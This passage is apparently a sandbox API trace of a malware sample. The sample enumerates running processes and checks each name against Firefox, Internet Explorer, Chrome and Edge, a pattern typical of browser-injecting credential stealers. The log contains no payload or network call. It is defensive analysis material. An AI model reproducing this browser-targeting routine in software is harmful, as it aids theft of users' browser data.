lpString2="chrome.exe") returned 1 [0193.206] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.206] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0193.206] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0193.206] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0193.206] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0193.206] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.206] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0193.207] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0193.207] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0193.207] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0193.207] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.207] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0193.207] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0193.207] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0193.207] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0193.208] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.208] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0193.208] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0193.208] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0193.208] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0193.208] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.208] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0193.209] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0193.209] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0193.209] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0193.209] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.209] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0193.209] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0193.209] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0193.209] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0193.209] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0193.209] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0193.210] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0193.210] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0193.210] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0193.210] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.210] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0193.210] CloseHandle (hObject=0xd4) returned 1 [0193.211] Sleep (dwMilliseconds=0x3e8) [0194.342] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0194.345] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.345] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0194.345] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0194.345] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0194.345] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0194.345] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0194.346] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0194.346] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0194.346] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0194.346] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0194.346] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0194.346] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0194.346] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0194.346] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0194.346] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.346] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0194.347] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0194.347] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0194.347] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0194.347] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.347] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0194.347] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0194.347] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0194.347] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0194.348] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.348] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0194.348] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0194.348] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0194.348] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0194.348] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.348] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0194.349] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0194.349] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0194.349] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0194.349] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.349] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0194.349] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0194.349] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0194.349] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0194.349] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.349] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0194.350] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0194.350] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0194.350] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0194.350] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.350] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0194.350] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0194.350] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0194.350] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0194.350] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.350] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.351] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.351] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.351] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.351] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.351] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.352] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.352] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.352] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.352] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.352] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.352] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.352] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.352] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.352] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.352] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.353] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.353] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.353] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.353] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.353] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.353] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.353] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.353] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.353] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.353] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0194.354] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0194.354] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0194.354] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0194.354] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.354] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.355] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.355] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.355] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.355] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.355] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.355] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.355] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.355] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.355] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.355] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0194.356] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0194.356] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0194.356] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0194.356] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.356] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0194.356] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0194.356] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0194.356] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0194.356] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.356] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0194.357] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0194.357] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0194.357] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0194.357] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.357] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.357] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.357] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.357] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.357] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.358] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0194.358] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0194.358] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0194.358] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0194.358] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.358] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0194.359] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0194.359] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0194.359] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0194.359] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.359] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0194.359] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0194.359] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0194.359] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0194.359] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.359] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0194.360] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0194.360] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0194.360] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0194.360] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.360] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0194.360] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0194.360] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0194.360] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0194.360] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.360] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0194.361] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0194.361] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0194.361] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0194.361] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.361] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0194.361] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0194.361] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0194.362] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0194.362] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.362] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0194.362] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0194.362] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0194.362] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0194.362] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.362] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0194.363] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0194.363] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0194.363] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0194.363] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.363] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0194.363] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0194.363] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0194.363] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0194.363] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.363] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0194.364] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0194.364] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0194.364] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0194.364] lstrcmpiA (lpString1="birth 